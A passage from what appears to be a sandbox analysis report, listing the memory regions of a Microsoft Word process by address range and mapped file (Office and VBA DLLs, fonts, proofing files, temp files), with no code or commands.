"private_0x0000000004300000" filename = "" Region: id = 406 start_va = 0x4320000 end_va = 0x4320fff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 407 start_va = 0x4340000 end_va = 0x4340fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 408 start_va = 0x4360000 end_va = 0x4360fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 409 start_va = 0x4380000 end_va = 0x4380fff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 410 start_va = 0x43b0000 end_va = 0x43b0fff entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 411 start_va = 0x4de0000 end_va = 0x4de0fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 412 start_va = 0x7fef6d50000 end_va = 0x7fef6f63fff entry_point = 0x7fef6d50000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 413 start_va = 0x2770000 end_va = 0x277efff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 414 start_va = 0x4390000 end_va = 0x43aefff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 415 start_va = 0x4df0000 end_va = 0x4e53fff entry_point = 0x4df0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 416 start_va = 0x9ea0000 end_va = 0x9f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000009ea0000" filename = "" Region: id = 417 start_va = 0xa120000 end_va = 0xa2d8fff entry_point = 0xa120000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 418 start_va = 0x7fef6000000 end_va = 0x7fef6034fff entry_point = 0x7fef6000000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 419 start_va = 0x7fef6040000 end_va = 0x7fef68bdfff entry_point = 0x7fef6040000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 420 start_va = 0x7fef5f70000 end_va = 0x7fef5f7bfff entry_point = 0x7fef5f70000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 421 start_va = 0x7fef5f80000 end_va = 0x7fef5ffdfff entry_point = 0x7fef5f80000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 422 start_va = 0x2740000 end_va = 0x2741fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 423 start_va = 0x7fef5f60000 end_va = 0x7fef5f6efff entry_point = 0x7fef5f60000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 424 start_va = 0x7fef5ee0000 end_va = 0x7fef5f5ffff entry_point = 0x7fef5ee0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 425 start_va = 0x7fefcdd0000 end_va = 0x7fefcdf2fff entry_point = 0x7fefcdd0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 426 start_va = 0x310000 end_va = 0x31efff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 427 start_va = 0x330000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 428 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 429 start_va = 0x2550000 end_va = 0x2561fff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 430 start_va = 0x40f0000 end_va = 0x410efff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 431 start_va = 0x4110000 end_va = 0x412efff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 432 start_va = 0x42b0000 end_va = 0x42cdfff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 433 start_va = 0x4310000 end_va = 0x432efff entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 434 start_va = 0x4350000 end_va = 0x436efff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 435 start_va = 0x44e0000 end_va = 0x44fefff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 436 start_va = 0x4500000 end_va = 0x451dfff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 437 start_va = 0x4da0000 end_va = 0x4dc0fff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 438 start_va = 0x4e60000 end_va = 0x4e7efff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 439 start_va = 0x4f90000 end_va = 0x4fd7fff entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 440 start_va = 0x4fe0000 end_va = 0x5027fff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 441 start_va = 0x5050000 end_va = 0x506efff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 442 start_va = 0x52e0000 end_va = 0x535ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052e0000" filename = "" Region: id = 443 start_va = 0x68a0000 end_va = 0x691ffff entry_point = 0x68a0000 region_type = mapped_file name = "~dfd77f46a35638169f.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DFD77F46A35638169F.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~dfd77f46a35638169f.tmp") Region: id = 444 start_va = 0x7fee3380000 end_va = 0x7fee38aafff entry_point = 0x7fee3380000 region_type = mapped_file name = "gkword.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gkword.dll") Region: id = 445 start_va = 0x2570000 end_va = 0x2572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002570000" filename = "" Region: id = 446 start_va = 0x74bd0000 end_va = 0x74ca1fff entry_point = 0x74bd0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll") Region: id = 447 start_va = 0x7fef0ca0000 end_va = 0x7fef10d0fff entry_point = 0x7fef0ca0000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 448 start_va = 0x2710000 end_va = 0x2711fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 449 start_va = 0x2750000 end_va = 0x2751fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 450 start_va = 0xa390000 end_va = 0xa39ffff entry_point = 0x0 region_type = private name = "private_0x000000000a390000" filename = "" Region: id = 451 start_va = 0xa3a0000 end_va = 0xa49ffff entry_point = 0x0 region_type = private name = "private_0x000000000a3a0000" filename = "" Region: id = 452 start_va = 0xa4a0000 end_va = 0xa566fff entry_point = 0xa4a0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 453 start_va = 0xa570000 end_va = 0xa62cfff entry_point = 0xa570000 region_type = mapped_file name = "arial.ttf" filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf") Region: id = 454 start_va = 0xa630000 end_va = 0xa6fbfff entry_point = 0xa630000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 455 start_va = 0x7fee37f0000 end_va = 0x7fee38a9fff entry_point = 0x7fee37f0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 456 start_va = 0x7fef1db0000 end_va = 0x7fef1e03fff entry_point = 0x7fef1db0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 457 start_va = 0x2760000 end_va = 0x2760fff entry_point = 0x2760000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 458 start_va = 0x2770000 end_va = 0x2770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002770000" filename = "" Region: id = 459 start_va = 0xa700000 end_va = 0xabb1fff entry_point = 0x0 region_type = private name = "private_0x000000000a700000" filename = "" Region: id = 460 start_va = 0x77250000 end_va = 0x77252fff entry_point = 0x77250000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 461 start_va = 0x7fef47a0000 end_va = 0x7fef47abfff entry_point = 0x7fef47a0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 462 start_va = 0xabc0000 end_va = 0xaca0fff entry_point = 0xabc0000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb") Region: id = 463 start_va = 0xacb0000 end_va = 0xaf31fff entry_point = 0xacb0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 464 start_va = 0xacb0000 end_va = 0xaf31fff entry_point = 0xacb0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 465 start_va = 0x7fee3560000 end_va = 0x7fee37eefff entry_point = 0x7fee3560000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 466 start_va = 0x42d0000 end_va = 0x42d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000042d0000" filename = "" Region: id = 467 start_va = 0x42f0000 end_va = 0x42fffff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 468 start_va = 0x7fef0c70000 end_va = 0x7fef0c95fff entry_point = 0x7fef0c70000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 469 start_va = 0x4300000 end_va = 0x4309fff entry_point = 0x4300000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 470 start_va = 0x6c30000 end_va = 0x6caffff entry_point = 0x6c30000 region_type = mapped_file name = "~wrf{a3611b61-20ad-44ed-b02e-c557bf46123e}.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{A3611B61-20AD-44ED-B02E-C557BF46123E}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{a3611b61-20ad-44ed-b02e-c557bf46123e}.tmp") Region: id = 471 start_va = 0xacb0000 end_va = 0xbcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000acb0000" filename = "" Region: id = 472 start_va = 0x4330000 end_va = 0x4330fff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 473 start_va = 0x5180000 end_va = 0x51bffff entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 474 start_va = 0x4340000 end_va = 0x4342fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 475 start_va = 0x4370000 end_va = 0x4373fff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 476 start_va = 0x4380000 end_va = 0x4380fff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 477 start_va = 0x43c0000 end_va = 0x43c0fff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 478 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 479 start_va = 0x4e80000 end_va = 0x4e87fff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 480 start_va = 0x5360000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 481 start_va = 0x5030000 end_va = 0x5032fff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 482 start_va = 0x6920000 end_va = 0x6936fff entry_point = 0x6920000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 483 start_va = 0xbcb0000 end_va = 0xcc7ffff entry_point = 0x0 region_type = private name = "private_0x000000000bcb0000" filename = "" Region: id = 484 start_va = 0xa2e0000 end_va = 0xa368fff entry_point = 0xa2e0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 485 start_va = 0x5040000 end_va = 0x5043fff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 486 start_va = 0x5070000 end_va = 0x5073fff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 487 start_va = 0x52c0000 end_va = 0x52c7fff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 488 start_va = 0x9170000 end_va = 0x91affff entry_point = 0x0 region_type = private name = "private_0x0000000009170000" filename = "" Region: id = 489 start_va = 0x6940000 end_va = 0x6942fff entry_point = 0x0 region_type = private name = "private_0x0000000006940000" filename = "" Region: id = 490 start_va = 0x6950000 end_va = 0x6957fff entry_point = 0x6950000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 491 start_va = 0x6960000 end_va = 0x6963fff entry_point = 0x0 region_type = private name = "private_0x0000000006960000" filename = "" Region: id = 492 start_va = 0xcd00000 end_va = 0xcdfffff entry_point = 0x0 region_type = private name = "private_0x000000000cd00000" filename = "" Region: id = 493 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 494 start_va = 0x69f0000 end_va = 0x69f3fff entry_point = 0x0 region_type = private name = "private_0x00000000069f0000" filename = "" Region: id = 495 start_va = 0x6a00000 end_va = 0x6a03fff entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 496 start_va = 0x6b90000 end_va = 0x6b93fff entry_point = 0x0 region_type = private name = "private_0x0000000006b90000" filename = "" Region: id = 497 start_va = 0x6ba0000 end_va = 0x6ba3fff entry_point = 0x0 region_type = private name = "private_0x0000000006ba0000" filename = "" Region: id = 508 start_va = 0xcec0000 end_va = 0xcfbffff entry_point = 0x0 region_type = private name = "private_0x000000000cec0000" filename = "" Region: id = 509 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 510 start_va = 0x6cb0000 end_va = 0x6cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000006cb0000" filename = "" Region: id = 511 start_va = 0x6de0000 end_va = 0x6df0fff entry_point = 0x0 region_type = private name = "private_0x0000000006de0000" filename = "" Region: id = 512 start_va = 0x6cd0000 end_va = 0x6cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000006cd0000" filename = "" Region: id = 513 start_va = 0x9ac0000 end_va = 0x9ad0fff entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 514 start_va = 0x9ac0000 end_va = 0x9b1afff entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 515 start_va = 0x9d40000 end_va = 0x9d9afff entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 516 start_va = 0x9fa0000 end_va = 0x9ffafff entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 517 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 523 start_va = 0x9fa0000 end_va = 0x9ffafff entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 524 start_va = 0xcfc0000 end_va = 0xd7bffff entry_point = 0x0 region_type = private name = "private_0x000000000cfc0000" filename = "" Region: id = 598 start_va = 0x2eb0000 end_va = 0x2eb1fff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 599 start_va = 0x40f0000 end_va = 0x40f1fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 600 start_va = 0x88b0000 end_va = 0x8bb9fff entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 601 start_va = 0x9ac0000 end_va = 0x9adafff entry_point = 0x9ac0000 region_type = mapped_file name = "cordia.ttf" filename = "\\Windows\\Fonts\\cordia.ttf" (normalized: "c:\\windows\\fonts\\cordia.ttf") Region: id = 602 start_va = 0x9ae0000 end_va = 0x9ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000009ae0000" filename = "" Region: id = 603 start_va = 0x9b00000 end_va = 0x9b01fff entry_point = 0x0 region_type = private name = "private_0x0000000009b00000" filename = "" Region: id = 604 start_va = 0x9b20000 end_va = 0x9b21fff entry_point = 0x0 region_type = private name = "private_0x0000000009b20000" filename = "" Region: id = 605 start_va = 0x9fa0000 end_va = 0x9fa1fff entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 606 start_va = 0x9fc0000 end_va = 0x9fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000009fc0000" filename = "" Region: id = 607 start_va = 0x9fd0000 end_va = 0x9fe8fff entry_point = 0x9fd0000 region_type = mapped_file name = "cordiai.ttf" filename = "\\Windows\\Fonts\\cordiai.ttf" (normalized: "c:\\windows\\fonts\\cordiai.ttf") Region: id = 608 start_va = 0xa000000 end_va = 0xa001fff entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 609 start_va = 0xa370000 end_va = 0xa371fff entry_point = 0x0 region_type = private name = "private_0x000000000a370000" filename = "" Region: id = 610 start_va = 0xaac0000 end_va = 0xab6afff entry_point = 0xaac0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 611 start_va = 0xab70000 end_va = 0xab87fff entry_point = 0xab70000 region_type = mapped_file name = "cordiab.ttf" filename = "\\Windows\\Fonts\\cordiab.ttf" (normalized: "c:\\windows\\fonts\\cordiab.ttf") Region: id = 612 start_va = 0xab90000 end_va = 0xab91fff entry_point = 0x0 region_type = private name = "private_0x000000000ab90000" filename = "" Region: id = 613 start_va = 0xabb0000 end_va = 0xabb1fff entry_point = 0x0 region_type = private name = "private_0x000000000abb0000" filename = "" Region: id = 614 start_va = 0xce00000 end_va = 0xceb9fff entry_point = 0xce00000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 615 start_va = 0xd7c0000 end_va = 0xd8bffff entry_point = 0x0 region_type = private name = "private_0x000000000d7c0000" filename = "" Region: id = 616 start_va = 0xd8c0000 end_va = 0xd990fff entry_point = 0xd8c0000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 617 start_va = 0xd9a0000 end_va = 0xda6ffff entry_point = 0xd9a0000 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 618 start_va = 0x7fef5210000 end_va = 0x7fef5263fff entry_point = 0x7fef5210000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 619 start_va = 0x7fee3940000 end_va = 0x7fee39ccfff entry_point = 0x7fee3940000 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll") Region: id = 992 start_va = 0x4100000 end_va = 0x4101fff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 993 start_va = 0x4120000 end_va = 0x4121fff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 994 start_va = 0x42c0000 end_va = 0x42c1fff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 995 start_va = 0x4320000 end_va = 0x4321fff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 996 start_va = 0x4360000 end_va = 0x4361fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 997 start_va = 0x43a0000 end_va = 0x43a1fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 998 start_va = 0x44f0000 end_va = 0x44f1fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 999 start_va = 0x4500000 end_va = 0x4500fff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1000 start_va = 0x4da0000 end_va = 0x4da1fff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 1001 start_va = 0x4dc0000 end_va = 0x4dc1fff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 1002 start_va = 0xda70000 end_va = 0xea3ffff entry_point = 0x0 region_type = private name = "private_0x000000000da70000" filename = "" Region: id = 1003 start_va = 0x7fee33b0000 end_va = 0x7fee347cfff entry_point = 0x7fee33b0000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msspell7.dll") Region: id = 1004 start_va = 0x7fee3180000 end_va = 0x7fee3215fff entry_point = 0x7fee3180000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7en.dll") Region: id = 1005 start_va = 0x7fee3220000 end_va = 0x7fee33a7fff entry_point = 0x7fee3220000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex") Region: id = 1006 start_va = 0x7fee30e0000 end_va = 0x7fee3179fff entry_point = 0x7fee30e0000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\css7data0009.dll") Region: id = 1055 start_va = 0x2ea0000 end_va = 0x2eaffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1056 start_va = 0x4110000 end_va = 0x411ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1057 start_va = 0x42b0000 end_va = 0x42b0fff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 1058 start_va = 0x42c0000 end_va = 0x42c0fff entry_point = 0x42c0000 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub") Region: id = 1059 start_va = 0x4320000 end_va = 0x4320fff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 1060 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 1061 start_va = 0x4360000 end_va = 0x4360fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 1062 start_va = 0x4390000 end_va = 0x4391fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 1063 start_va = 0x43a0000 end_va = 0x43a0fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 1064 start_va = 0x4510000 end_va = 0x4511fff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 1065 start_va = 0x5050000 end_va = 0x5051fff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 1066 start_va = 0x5090000 end_va = 0x5091fff entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1067 start_va = 0x50c0000 end_va = 0x50c1fff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 1068 start_va = 0x50f0000 end_va = 0x50f1fff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 1069 start_va = 0x5120000 end_va = 0x5121fff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 1070 start_va = 0x5150000 end_va = 0x5151fff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 1071 start_va = 0x8bc0000 end_va = 0x8d47fff entry_point = 0x8bc0000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex") Region: id = 1072 start_va = 0xea40000 end_va = 0xf241fff entry_point = 0xea40000 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex") Region: id = 1073 start_va = 0x7fee2b80000 end_va = 0x7fee30dbfff entry_point = 0x7fee2b80000 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nl7models0009.dll") Region: id = 1074 start_va = 0x7fef5060000 end_va = 0x7fef507afff entry_point = 0x7fef5060000 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_en.dub") Region: id = 1075 start_va = 